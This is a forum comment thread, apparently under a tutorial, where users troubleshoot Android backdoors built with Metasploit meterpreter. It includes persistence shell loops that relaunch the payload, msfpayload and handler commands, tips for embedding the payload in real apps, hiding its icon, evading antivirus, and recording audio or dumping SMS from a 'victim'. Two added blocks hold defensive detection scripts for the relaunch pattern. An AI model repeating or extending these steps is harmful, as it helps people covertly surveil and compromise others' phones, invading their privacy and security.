hello F.E.A.R ,my router is realtek PCIe GBE Family Controller,i dont know what my router number model,im lost the package box,even in the link u provided to me,the
only realtek model listed just 1 and thats doesnt even match with my router,any advice ??

 REPLY

F.E.A.R.
2 YEARS AGO 1

You know how to access your Router's login page right? If not then google it. Once you are in, get me a screenshot =)

 REPLY

SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Hi F.E.A.R awesome tutorial, keep it up!! They are very interesting!!

Though, I have some problem and hope that you have the answers for that, just learning Kali Linux and its so much fun :)

I will send screenshot first and then write my problem.

Image via gyazo.com

1. Even though my phone is rooted and I have checked by typing check_root in meterpreter (it says Device is rooted with a green plus sign next to it), when I try to upload alltid.sh in cd /etc/init.d it says Operation failed 1.
2. So I tried the other way by uploading the file to sdcard/Download and it worked, but then when I type sh alltid.sh (when I'm in shell) I get the error on the screenshot. I have tried typing your script both in leafpad and in terminal (nano anything.sh, then typing the script's code); still I get that error 2 and 3.

Samsung Galaxy s4 running CyanogenMod ROM not MIUI :P

Do you have any idea what the problem is?

Best wishes, Sagate :)

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Thank You Sagate! I appreciate it.

1) You need to drop into shell and type su for root access. (A tutorial containing this will be published soon)

2) Go through the tutorial again, I wrote:


" There is a 'space' between 'while' and ':' "

 REPLY

SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO 1  

1. Ohh so I write shell and then type su, then upload alltid.sh in the init.d directory? Will try that when I get home.
2. My bad, I read there is no space, damn. Im sorry.

Also if you could learn us how to port forward as you stated earlier to hack with WAN.

Thanks F. E. A. R. For the reply, will try this when I get home :-)

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Reply with your router details.

 REPLY

SAGATE
2 YEARS AGO 1  

I have a technicolor TG799TSvn v2

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Follow this guide to open the ports (4444 and 80)

Now test the hack, if it does not work, go to the firewall option of your router's config page and get me a screenshot (OR allow the ports through firewall if you know
how to.)

 REPLY

SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO 1

Thank you, I will try that guide and I will try the hack and let you know :)

Btw, It worked! By going into shell and typing su. I was able to type sh alltid.sh and now it works, sessions gets automatic open when I enter meterpreter.

But I still wasnt able to understand how to upload alltid.sh into cd /etc/init.d and look forward to that tutorial but I have the other method in the meantime.

Thank you F.E.A.R :D

 REPLY

F.E.A.R.
2 YEARS AGO 1  

It has already been published :D

 REPLY

PINKYFIRE
2 YEARS AGO 1  

finally im figured out what my router model,its TP-LINK TD W8951ND


my new problem is,i dnt know my router password.im gonna back when im log on to the log in page

 REPLY

F.E.A.R.
2 YEARS AGO 1  

This guide, right here will explain everything.

Local IP Address: "Your Internal Kali IP (ifconfig)"


Start Port: 4444
End Port: 4444

 REPLY

ASHWIN DEVRAJ
2 YEARS AGO 1  

I have done everything u said, but after opening the file I sent to the device it says parsing error (there is a problem parsing the package). Need urgent help

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Right here

 REPLY

JESSICA THOMSON
2 YEARS AGO - EDITED 2 YEARS AGO 1  

F.E.A.R thank you for such great tuts :)


i have couple of questions.. i hope u dont mind answering :)
i have done the easy work like creating and signing the apk.

and then I tested it over WAN and it did work fine. The problems I faced are: the first 3 or 4 times the session closed in less than a minute, and on the next try it didn't close and I had enough time to experiment with commands. Can u tell why this happened? At the start it doesn't show commands like dump_sms and other commands. Why does this happen?

can we start keylogging in meterpreter shell ?


can we migrate or bind our meterpreter process/ session to another process ?

When I record mic, it just records 1 or 2 sec of audio even when I typed record_mic 1000. Can u tell how I can record audio for a longer duration?

i can not dump my sms and contacts( their was an error dont know why) but i was able to dump my call log.

sorry for lots of questions and excuse my english

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Welcome Jessica,
Android Meterpreter is still in development. (It is quite unstable)

After the meterpreter session starts, the commands (dump_sms etc.) can be used and can be displayed using help command. Anti-Virus is the only reason for this to
happen. (Specially pre-installed ones, like in Mi or Samsung) If you can somehow make the AV to 'fully trust' the application 'Main Activity' then these problems do not
occur (Tested in Mi)

No, we cannot either perform Key-logging or Migrate to other processes, these Post-Modules are for Windows.

However you can use scripts to key-log from the stock android keyboard and for migration purposes (may need root access)

Recording, (record_mic 20) is not an issue for me, try this again without signing the application. (Use it Raw)

Answer to the last question is same as the first one, I use only the raw .apk and there is no problem executing the commands.

Run this command and tell the result in your reply please: check_root

 REPLY

JESSICA THOMSON
2 YEARS AGO 1  

Thank you F.E.A.R. Appreciate you replied fast :))

without signing the apk it can not be installed. i tried it


my test phone is root, i rooted it my self and i checked it with same command.
how do i make AV to trust my apk? can you direct me to such tut or guide ?
record mic stil doesn't work for me. :((

i am only able to dump call log but i can not dump my sms and contacts... i think some kind of timeout, may b i have lots of texts in my inbox and lots of contacts..
iam not sure :?

Thnx again FEAR

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Jessica:
You can either make it 'trust' the app or disable its real-time protection from settings.

For example, in the CM Security AV application, when I disable the 'Real Time Protection' option, it doesn't scan the malicious .apk and hence the permissions to access microphone or camera are by default set to grant; however, if the option is enabled, the AV scans the permissions of the App and resets them to Prompt or Deny.

If while dumping sms and contacts there is a time-out error then it is because of the faulty/slow connection and not any internal errors. The dumping process may take
even 20 minutes (as in my case).

Try deleting all the useless ones (spam) and then dump again. (Just for the test)

 REPLY

ZI LSD
2 YEARS AGO 1  

If the Android device is not ROOT there is another solution.


When the device is put in charge or boot, the backdoor restarts.

for that you have to modify the source of the original apk with Android Studio.

jpeg
explanation here

 REPLY

F.E.A.R.
2 YEARS AGO 2  

Thank You ZI,

But actually there are many other ways to achieve this, I came to know, 3 days after publishing the guide. (Never thought of updating the guide)

 REPLY

ADARSH SINGH
2 YEARS AGO 1  

Hey Fear, I have backdoored the Main activity apk with the original hike apk and the backdoor works great but I want it persistent, and I tried your script but it gives me this error when I execute the script from the shell.

meterpreter > shell


Process 3 created.
Channel 4 created.
cd /storage/sdcard0/download
ls
agent.apk
anything.sh
sh anything.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

(I am using the version of the script below, and when I install only the MainActivity.apk on my android (Jelly Bean) phone the script works, but when I installed the backdoored apk the script doesn't work and gives me the error shown above.)

(this is the script i am using i think i need to modify something in this script to work it out)
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Do I need to modify the script to work because I have embedded it into another apk? Help would be really appreciated.

 REPLY


F.E.A.R.
2 YEARS AGO 1  

Ooh I see, nice!


If you did it with Hike, just modify this line-"com.metasploit.stage/.MainActivity".
For Hike it might be something like this: com.google......../."..."

Since I don't use Hike, you can check the correct location by navigating to /sdcard/Android/Data/ for "com.google......."

And the /."..." is used to execute the application, so decompile the app (hike) and extract the name of the program, it should be in the .xml file.

Also this would make the application (hike) with the malicious app open,
but I am sure you will find a way out ;)

 REPLY

ADARSH SINGH
2 YEARS AGO 1  

Yup! I will try it out today.Hope this works for me:)

 REPLY

ADARSH SINGH
2 YEARS AGO 1  

Hey Fear as you said i tried to modified the script but it is not working for me or else i am doing it wrong.I am providing you with the android manifest.xml .Here is
the androidmanifest.xml

http://www.mediafire.com/view/0jbw13nh4di2ani/AndroidManifest.xml.txt

You told me to navigate to /sdcard/Android/Data/ for "com.google......." and here is the output of that
http://www.mediafire.com/view/4j4t2kq6oqwd7ea/output.txt

So please tell me what changes should i make in "com.metasploit.stage/.MainActivity" to make the script working please i really appreciate if you help me out of this.

 REPLY

MM A
1 WEEK AGO 1  

come on man i have the same problem if the app opens with the exploit he/she will uninstall it :((((( what should we do ??

 REPLY

DARK BLOGGER
2 YEARS AGO 1  

how do you do that? can you sent me a copy of your eclipse project?

I have found a way to make it FUD by changing the name in package com.metasploit.stage to com.yourname.stage and also in the java files import package com.yourname.stage

but I can't make it persistent because I need to register a receiver and also afterwards I need to bind it with another legitimate app

 REPLY

CV NIKHIL
10 MONTHS AGO 1  

is internet is required?

 REPLY

CB
2 YEARS AGO - EDITED 2 YEARS AGO 1  

Hi F.E.A.R, thank you for the guide. I have a problem accessing /sdcard and also the main system folders. The error is: stdapi_fs_chdir: Operation failed: 1. Can you help me? Test Phone: S3 and S5

I saw that when I install the apk not asking for access permission to sdcard...

 REPLY

ZI LSD
2 YEARS AGO 1  

Now, I look to hide the icon and task


The apk crash with this code in MainActivity

PackageManager p = getPackageManager();

ComponentName componentName = new ComponentName(this, com.apps.MainActivity.class);

p.setComponentEnabledSetting(componentName,PackageManager.COMPONENTENABLEDSTATEDISABLED, PackageManager.DONTKILLAPP);

I look for a solution

 REPLY

ZI LSD
2 YEARS AGO 2  

I Found!
Mod backdoor for persistent and hide ico. No rooted devices >>

HERE : HT1.txt

 REPLY

HASOC
1 YEAR AGO - EDITED 1 YEAR AGO 1  

Hi, Do you have a recompiled version of your mod? Would like to try it.

Or can you plz elaborate how to implement and recompile android payload with your mod (HT1.txt)?

Cheers in advance!

 REPLY

ECLIPSE
2 YEARS AGO 1  

Hi, it said the apk is virus when i send it and installed it. the guy had some software cm security or something like it and it said of main activity a dangerous program
and it was killed by the anti virus. now how to make save it from the anti virus? ideas? thanks yes it is a great post xD

 REPLY

F.E.A.R.
2 YEARS AGO 1  

Yes I know, already tried with all the best Anti-Viruses.

Here's a solution to all the AV's!

 REPLY

VISHAL RAGHAV
2 YEARS AGO - EDITED 2 YEARS AGO 1  

hey F.E.A.R. you are doing some grt work here and your tutorial made me so much interested in hacking. a big thanks to u...

and i want to ask u how to port forward on my router...

model number - Tp link w8968v4 i hv tried every guide on the internet but i am unable to get it to work. and can you tell me if there is any way to keylog the hacked
but "not rooted" device.

 REPLY

DARK BLOGGER
2 YEARS AGO 1  

I have the source code of the msf payload. How do I add a receiver? For example bootcomplete or alarm? Because your persistence script works but generates sessions every 20 seconds.

I have found how to make it seem like a legitimate app and bypass antivirus, but my problem is I need help with android receivers

 REPLY
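
The relaunch loop discussed throughout this thread (the same activity started by `am start` every 20 or 600 seconds) leaves a regular pattern in the device log that a defender can search for. The following is an added example, not part of the original thread or of any commenter's post: it flags components whose activity starts recur at a near-constant interval, independent of the package name. The log lines are constructed, and the `START` line layout, `com.example.*` names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample, not captured from a device. Layout follows
# `logcat -v threadtime`; the START line shape is modelled on ActivityManager
# output and varies between Android releases (assumption).
SAMPLE_LOG = """\
11-13 09:00:00.000  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.updater/.Main} from uid 10140
11-13 09:10:00.300  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.updater/.Main} from uid 10140
11-13 09:20:00.650  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.updater/.Main} from uid 10140
11-13 09:30:00.900  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.updater/.Main} from uid 10140
11-13 09:42:02.101  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
11-13 09:42:10.000  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10050
11-13 09:42:22.540  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
11-13 09:42:43.012  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
11-13 09:43:03.455  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
11-13 09:43:23.901  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
11-13 09:43:55.200  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10050
11-13 09:50:01.700  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10050
11-13 09:50:30.100  1234  1250 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10050
11-13 09:51:00.000  2222  2222 D SomeOtherTag: unrelated line
"""

START_RE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+\d+\s+\d+\s+I\s+"
    r"Activity(?:Task)?Manager:\s+START\s+u\d+\s+\{(?P<intent>[^}]*)\}"
)
CMP_RE = re.compile(r"\bcmp=(\S+)")
DEFAULT_STAGE_PACKAGE = "com.metasploit.stage"  # package name shown on this page


def parse_starts(log_text):
    """Map each explicit component to the sorted times it was started."""
    starts = defaultdict(list)
    for line in log_text.splitlines():
        m = START_RE.match(line)
        if not m:
            continue
        cmp_m = CMP_RE.search(m.group("intent"))
        if not cmp_m:
            continue  # implicit intent, no component to attribute the start to
        # threadtime carries no year; pin a leap year so "02-29" still parses.
        ts = datetime.strptime("2000-" + m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
        starts[cmp_m.group(1)].append(ts)
    return {component: sorted(times) for component, times in starts.items()}


def find_relaunch_loops(log_text, min_events=4, max_jitter_s=2.0):
    """Return components started at a near-constant period (heuristic).

    A person opening an app produces irregular gaps; a `sleep N` loop around
    `am start` produces gaps that all sit within a second or two of N.
    """
    hits = []
    for component, times in parse_starts(log_text).items():
        if len(times) < min_events:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if period <= 0 or any(abs(g - period) > max_jitter_s for g in gaps):
            continue
        hits.append({
            "component": component,
            "count": len(times),
            "period_s": round(period, 1),
            # Name match is a bonus signal only; the timing test above does
            # not depend on it.
            "default_stage_name": component.split("/")[0] == DEFAULT_STAGE_PACKAGE,
        })
    return sorted(hits, key=lambda h: h["component"])


if __name__ == "__main__":
    for hit in find_relaunch_loops(SAMPLE_LOG):
        print(hit)
```

A hit is a lead for triage rather than proof: review the flagged package's install source and requested permissions before acting on it.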

SANDEEP YADAV
1 YEAR AGO 1  

well work bro

i have a problem when im install the backdoor in the android im getting an error (THERE WAS A PROBLEM WHILE PARSING THE PACKAGE )

PLEASE TELL ME WHAT IT AND HOW TO FIX IT

 REPLY

BIRAT BOSE
1 YEAR AGO 1  

Hellooo !! can anybody help me about removing the payload android apk from the victim's phone?? plzzz help!!

 REPLY

HAMMAD RAHMAN
1 YEAR AGO 1  

Hi there F.E.A.R
GREAT tutorial!!
I got WAN working and everything

But, my phone is rooted, and when i drop into shell and su, it shows superuser prompt on screen to get access for MainActivity.

therefore, wont the victim see this and decline it? It is meant to be discreet, no?

Help please, thanks much!!

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 1  

I have signed and aligned the payload.. but it does not install on Huawei phones!!
While making the payload.. I got no errors.

 REPLY

SIMON TADROS
1 YEAR AGO 1  

any solution for Lollipop?

 REPLY

AB'S CHOUDHARY
1 YEAR AGO 1  

use msfvenom instead of msfpayload

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO - EDITED 1 YEAR AGO 1  

script is not working..


I tried on LAN and WAN.
my android is 5.0.2 and didn't copy and paste the script..I typed it.

but the "upload command" didn't work for me so I uploaded the script using USB cable to my device ( /sd/download) and after shell command and executing the script,
I exited the listener and made a new one..but no session activated.

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 1  

does matter if we use port 4444 or 443?

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 1  

Any answers???

 REPLY

UGLY LAD
1 YEAR AGO 1  

Can anybody help me? I get a meterpreter connection and then I upload anything.sh; however, when I execute anything.sh via shell the script runs but says com.metasploit.stage/.MainActivity not found

F.E.A.R, Occupy the Web, can any of u guys help me plz

 REPLY

ROSE
1 YEAR AGO 1  

Hi

 REPLY

ROSE
1 YEAR AGO 1  

Hi there, I have question. If I install Kali on VM machine, which IP will be public and which will be private (Internal).

As I got an issue while session (meterpreter) and I think this will solve the issue.

Thanks

 REPLY

UGLY LAD
1 YEAR AGO 1  

type ifconfig in VM Kali to get your internal IP and google "my IP" to get your public IP

 REPLY

ROSE
1 YEAR AGO 1

Thanks dear I am trying now

 REPLY

ROSE
1 YEAR AGO 1  

Still not working, I got stuck after typing exploit

Nothing appear

 REPLY

ROSE
1 YEAR AGO 1  

exploit completed, but no session was created

Also, Android device, .apk file I got that the app. already installed coz I install it before, how I can remove maybe this cause issue

 REPLY

ROSE
1 YEAR AGO 1  

please assist me

 REPLY

ROSE
1 YEAR AGO 1  

No body can assist me??

 REPLY

ROSE
1 YEAR AGO 1  

No response>>

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 1  

if u r using a VM machine, u need to go to network setting of ur machine and set it on bridge.


if u do this ur machine and AP get a same IP then meterpreter session will work

 REPLY

ROSE
1 YEAR AGO 1  

Hi, thanks dear. Your answer is make a sense and I will try it now.

 REPLY

MATHIS GAXBOY
1 YEAR AGO 1  

i have the same problem i dont get a session

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 1  

on LAN or WAN?
if ur trying on LAN and dont get meterpreter session, there must be problems with ur listener port or payload file..

if ur trying on WAN then u should check ur port forwarding. also u need to check if there is any problems while making the payloadfile.apk

 REPLY

NIMA AMINI
1 YEAR AGO 1  

Hey guys
I backdoored the payload into HotSpot and changed the anything.sh to this:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n com.anchorfree.ui/.ViewHome
sleep 600
done

but when I run the "sh anything.sh" it gives me this error:

Error type 3
Error: Activity class {com.anchorfree.ui/com.anchorfree.ui.ViewHome} does not exist.

I do everything exactly as you said. Would you please say what should I do?

 REPLY

MOJTABA GHANIDEL
4 MONTHS AGO 1  

use this code

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n package name/activity address
sleep 600
done

 REPLY

GIREESH PAI
1 YEAR AGO 1  

APK size is 0 bytes :(

 REPLY

SAHIL HARIDAS
1 YEAR AGO 1  

Thanks for the great post F.E.A.R. but I cant seem to be able to change the directory to init.d

When I listed all the files it wasn't found. Is there an alternate folder is it possible that the startup folder has changed on my Huawei P8???

 REPLY

JONE DEEP
1 YEAR AGO 1  

how to bypass the AV????

 REPLY

FRANCK KOUASSI
1 YEAR AGO -1 HIDDEN

ABHISHEK SEVARIK
1 YEAR AGO 1  

thanks fear
but when i execute sh anything.sh it says syntax error while is unmatched what should i do
please reply me as soon as possible

 REPLY

KALYAN VISWANATH
1 YEAR AGO 1  

Hi FEAR
Am getting this error
Please help

 REPLY

HUSSAM FELIMBO
1 YEAR AGO - EDITED 1 YEAR AGO 1  

Great tutorial, looking forward to trying it later tonight!

Just a quick question about a line of code:


do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

Will I have to change ".MainActivity" if I changed the appname in <string name="appname">MainActivity</string> when decompiling the malicious apk according to this?

Keep up the wonderful work!

Thanks!

 REPLY

WALEED AFZAL
1 YEAR AGO 1  

gud job F.E.A.R (y)

 REPLY

WALEED AFZAL
1 YEAR AGO 1  

F.E.A.R i have a problem my meterpreter is not open i don't know why when i enter the command exploit it try to start but can't start u tell me what's the problem i try
this from 1 week

 REPLY

SAGAR BALYAN
1 YEAR AGO 1  

This backdoor doesn't work for me at all ! I have uploaded the backdoor on victim's phone but it doesn't bring the session back once it has died.

Please Help !

 REPLY

DRMTR FDFFS
1 YEAR AGO 1  

Exploit Works !

You need to start exploit with this command:

ExitOnSession false
exploit -j

and Metasploit will keep session from dead.

 REPLY

MOJTABA GHANIDEL
1 YEAR AGO 2  

guys i need a little help


i have embed payload.apk into original APK file, and is working well
but i want to use the script. how should i change the parameters of the script?

 REPLY

NICOLÁS ALEJANDRO MARTÍNEZ


1 YEAR AGO 1  

this is only for rooted cellphones? I can't find the init.d folder, where i have to upload the .sh ?

 REPLY

BARROW
1 YEAR AGO 1  

Did you read the first part of the guide here?

 REPLY

ALEX ALEX
1 YEAR AGO 1  

I can't open the sdcard after the session opens. What should I do?

 REPLY

GANESH VARMA
1 YEAR AGO - EDITED 1 YEAR AGO 1

Hi, great tutorial. I was able to get a meterpreter session over my local network but can't make it work over the internet (WAN). Unfortunately I have a router (DIGISOL-HR1400) which has port triggering instead of port forwarding, and I have heard that it is similar to port forwarding. I've tried a number of ways to set up port triggering but it just doesn't work. So any kind of help on how to set up port triggering is really appreciated!! :)

 REPLY

>_E.X.P.L.O.I.T
1 YEAR AGO 1  

Why does it keep saying ...'while' unmatched ?

 REPLY

FUNKY FUNKYDREAM
1 YEAR AGO 1  

Hi F.E.A.R
thanks for this tuto ;)
for my phone the reversetcp exploit works but not the remaining of the tuto ... :(

It seems that you need a rooted device to get success right ?

I can't enter /etc/init.d or /system/etc/init.d (/etc is ok ...)

* Started reverse TCP handler on 192.168.0.16:443


* Starting the payload handler...
* Sending stage (63194 bytes) to 192.168.0.15
* Meterpreter session 9 opened (192.168.0.16:443 -> 192.168.0.15:36014) at 2016-11-13 09:42:42 -0500

meterpreter > pwd


/data/data/com.metasploit.stage/files
meterpreter > cd /
meterpreter > pwd
/
meterpreter > cd /etc/init.d

stdapi_fs_chdir: Operation failed: 1

Then, after uploading my getroot.sh script, it doesn't execute properly:

sh getroot.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

Do you have any clue for me ?

I'm using a Samsung Galaxy Grand Prime (Android 5.1.1 / Kernel 3.14.27-1070395)

Any help would be appreciated ...

Best
FunkyDream

 REPLY

SIVA ADITHYA
1 YEAR AGO 1  

First, this is a great tutorial, but I need help. When I executed this script I got the error: Error: Bad component name: com.metasploit.stage/

What should I do? Please help me.

 REPLY

TAREK ABD-ALLAH FARRAG


1 YEAR AGO 2  

Can anybody tell me how to modify the .sh file to match an embedded payload in another original apk? How should I change the parameters of the script?

 REPLY

PAPANIREAL
11 MONTHS AGO - EDITED 11 MONTHS AGO 1  

Yeah, I also need a bit of help at this point.

Any help would be appreciated.

 REPLY

DHARMI STEPH
11 MONTHS AGO - EDITED 11 MONTHS AGO 1  

Thank you for your great tutorial F.E.A.R but I'm having a problem running the script in shell...
I'm getting
Error type 3
Error: Activity class {com.metasploit. stage/com.metsaploit.stage.MainActivity} does not exist.
Here is a screenshot below

Any help will be appreciated.....


Thanks a lot
BTW...I'm using a rooted Samsung galaxy note 3 running android 5.0 stock rom

 REPLY

AKANSHA SINGH
11 MONTHS AGO 1  

I've embedded it in the hike apk. The error says that com.metasploit.stage.MainActivity does not exist. How to fix this?

 REPLY

IRRESISTIBLE GUY
10 MONTHS AGO 1  

Please help me with port forwarding. I am in desperate need to exploit an android on another network.

Please Somebody help me.

 REPLY

GHADEER ALALI
8 MONTHS AGO 1  

Anyone knows the list for all cmds available to execute on victims phone?
for e.g. delete media.

 REPLY

SARTORY NONAME
8 MONTHS AGO 1  

Hi F.E.A.R.,
thanks for the tutorial.
It's all working except for the last and crucial step:
after

 sh anything.sh

I get the error message

 Starting: Intent { act=android.intent.action.MAIN cat=android.intent.category.LAUNCHER pkg=–-user }

java.lang.SecurityException: Permission Denial: startActivity asks to run as user -2 but is calling from user 0; this requires
android.permission.INTERACT_ACROSS_USERS_FULL

at android.os.Parcel.readException(Parcel.java:1686)
at android.os.Parcel.readException(Parcel.java:1639)
at android.app.ActivityManagerProxy.startActivityAsUser(ActivityManagerNative.java:3119)
at com.android.commands.am.Am.runStart(Am.java:635)
at com.android.commands.am.Am.onRun(Am.java:388)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:51)
at com.android.commands.am.Am.main(Am.java:121)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:262)

Somebody facing the same problem?


Any tips?

Sartory

 REPLY

SARTORY NONAME
8 MONTHS AGO 1  

Found a solution:
On Android 6.0 you have to use the following script:

#!/bin/bash
# upload to etc/init.d/, so that it is persistent even after reboot!
while :
do am startservice --user 0 com.metasploit.stage/.MainService
sleep 60
done

¯\(?)/¯ Sartory
 REPLY
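
From the defender's side, the boot-script loop posted in this thread leaves a recognisable trace. The following is an added example, not part of the original thread or the tutorial: it scans a directory of init.d-style scripts (assumed here to be a copy pulled from a device for review) for an endless loop that calls `am start` or `am startservice`. The function names and the sample files are constructed for illustration.

```shell
#!/bin/bash
# Added example: find init.d-style boot scripts that relaunch an app component
# in an endless loop (the persistence pattern posted in this thread).

AM_CALL='(^|[^[:alnum:]_])am[[:space:]]+(start|startservice)([[:space:]]|$)'
LOOP_HEAD='while[[:space:]]+(true|:)'
COMPONENT='[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z0-9_]+)+/\.?[A-Za-z0-9_.]+'

# Print each regular file in directory $1 that contains both an
# activity-manager start call and an endless-loop header.
scan_initd() {
    local f
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        grep -Eq "$AM_CALL" "$f" && grep -Eq "$LOOP_HEAD" "$f" && printf '%s\n' "$f"
    done
    return 0
}

# Print the package/.Class component(s) that file $1 starts.
started_components() {
    grep -E "$AM_CALL" "$1" | grep -Eo "$COMPONENT" | sort -u
}

# Build a constructed sample directory (stand-in for a pulled init.d copy).
make_sample() {
    local d
    d=$(mktemp -d) || return 1
    printf '%s\n' '#!/system/bin/sh' 'while :' \
        'do am startservice --user 0 com.metasploit.stage/.MainService' \
        'sleep 60' 'done' > "$d/99persist"
    printf '%s\n' '#!/system/bin/sh' 'while true; do sleep 5; done' > "$d/10idle"
    printf '%s\n' '#!/system/bin/sh' 'echo "program started"' > "$d/20log"
    printf '%s\n' "$d"
}

# One report line per flagged script, naming what it relaunches.
report() {
    local f
    scan_initd "$1" | while IFS= read -r f; do
        printf 'SUSPICIOUS %s -> %s\n' "${f##*/}" "$(started_components "$f" | paste -sd' ' -)"
    done
}

# Demo on the constructed sample.
sample_dir=$(make_sample) && report "$sample_dir"; rm -rf "$sample_dir"
```

A script is flagged only when both patterns are present, so the constructed `10idle` (loop, no launch) and `20log` (the substring "am start" inside "program started") are not reported.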
 

TAHA TEMURI
8 MONTHS AGO 1  

The Meterpreter session is not received when I run the payload. My IP address is dynamic, so could that be the reason for not receiving the payload? I used the following.

For payload
msfpayload android/meterpreter/reverse_tcp LHOST=MYEXTERNALIPHERE R > /root/abcde.apk
Then for Listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST MYPRIVATEIP
exploit

 REPLY

MAT PON
7 MONTHS AGO 1  

Hi to all, I have just enrolled here.

I learned that it is possible to make the backdoor persistent by enabling the apk to start on phone boot / startup. There is plenty of material about it.

2) To prevent antivirus from blocking installation, I think we probably need to sign the apk
3) thanks

 REPLY

ABDUL MANAN
5 MONTHS AGO 1  

hey

I just wanted to say I did as you said, but whenever I try to reconnect or, say, reboot, it just doesn't connect and gives an error, while on the victim's end it says "unfortunately
mainactivity stopped working". Any suggestions?

 REPLY

HACK3RSP0T .
5 MONTHS AGO 1  

If you are facing any problem, follow this video tutorial. Thank me later :)

 REPLY

PRUDHVI GALI
5 MONTHS AGO 1  

root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=124.123.69.237 R > /root/Upgrader.apk

bash: msfpayload: command not found

PLS help me with this... I would be grateful

 REPLY

CONNER DASSEN
LAST MONTH 1  

The screen needs to be turned on for this to work.

I had the handler listening for 2 minutes and nothing happened, but when I turned on the screen it instantly connected. And it keeps losing the connection, often it says
"Session closed. Reason: died" within 2 minutes.
 REPLY
